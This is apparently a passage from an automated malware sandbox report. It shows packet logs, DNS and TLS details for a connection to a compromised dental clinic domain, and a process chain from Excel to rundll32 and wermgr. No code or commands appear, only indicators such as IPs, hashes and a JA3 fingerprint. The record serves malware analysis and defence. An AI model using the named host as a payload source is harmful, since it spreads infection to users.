Jan 5, 2021 13:01:07.479768038 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.480004072 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.514084101 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.707853079 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.707982063 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:08.878242970 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.106628895 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276684999 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276724100 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276753902 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276793003 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276828051 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276865005 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276901007 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276920080 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.276947975 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.276989937 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.276989937 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277025938 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277029037 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277034998 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277065992 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277079105 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277086020 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277105093 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277134895 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277139902 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277168989 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277173042 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277200937 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277214050 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277235031 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277260065 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277267933 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277301073 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277314901 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277337074 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277348042 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277374029 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277399063 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277420998 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277442932 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277478933 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277504921 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277524948 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277530909 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277565002 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277575970 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277601004 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277602911 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277638912 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277654886 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277667046 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277686119 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277703047 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277714014 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277740002 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277741909 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277776957 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277795076 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277823925 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277822971 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277863979 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277899981 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277915001 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277936935 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.277947903 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277973890 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.277973890 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278009892 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278026104 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278047085 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278078079 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278084040 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278110027 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278131008 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278137922 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278162956 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278196096 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278198957 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278227091 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278235912 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278249979 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278273106 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278283119 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278307915 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.278326035 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.278356075 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.283272028 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:09.466720104 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466777086 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466815948 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:09.466854095 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 13:01:06.999558926 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:07.055907011 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 13:01:08.122844934 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:08.170912027 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 13:01:08.184622049 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:08.232651949 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:06.999558926 CET | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:07.055907011 CET | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | | penrithdentalimplants.com.au | | CNAME (Canonical name) | IN (0x0001) |
Jan 5, 2021 13:01:07.055907011 CET | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | | | 160.153.76.195 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:07.479768038 CET | 160.153.76.195 | 443 | 192.168.2.22 | 49167 | CN=penrithdentalimplants.com.au, O=Nepean Dental Implants and Cosmetic Dentistry, L=Penrith, ST=New South Wales, C=AU | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Aug 07 20:52:48 CEST 2020 | Wed Oct 06 15:19:58 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
| | | | | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | | |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 13:00:41 |
Start date: | 05/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f220000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 13:00:50 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcd0000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 13:00:51 |
Start date: | 05/01/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 44544 bytes |
MD5 hash: | 51138BEEA3E2C21EC44D0932C71762A8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 13:00:52 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\wermgr.exe |
Wow64 process (32bit): | |
Commandline: | |
Imagebase: | |
File size: | 50688 bytes |
MD5 hash: | 41DF7355A5A907E2C1D7804EC028965D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Disassembly |
---|
Code Analysis |
---|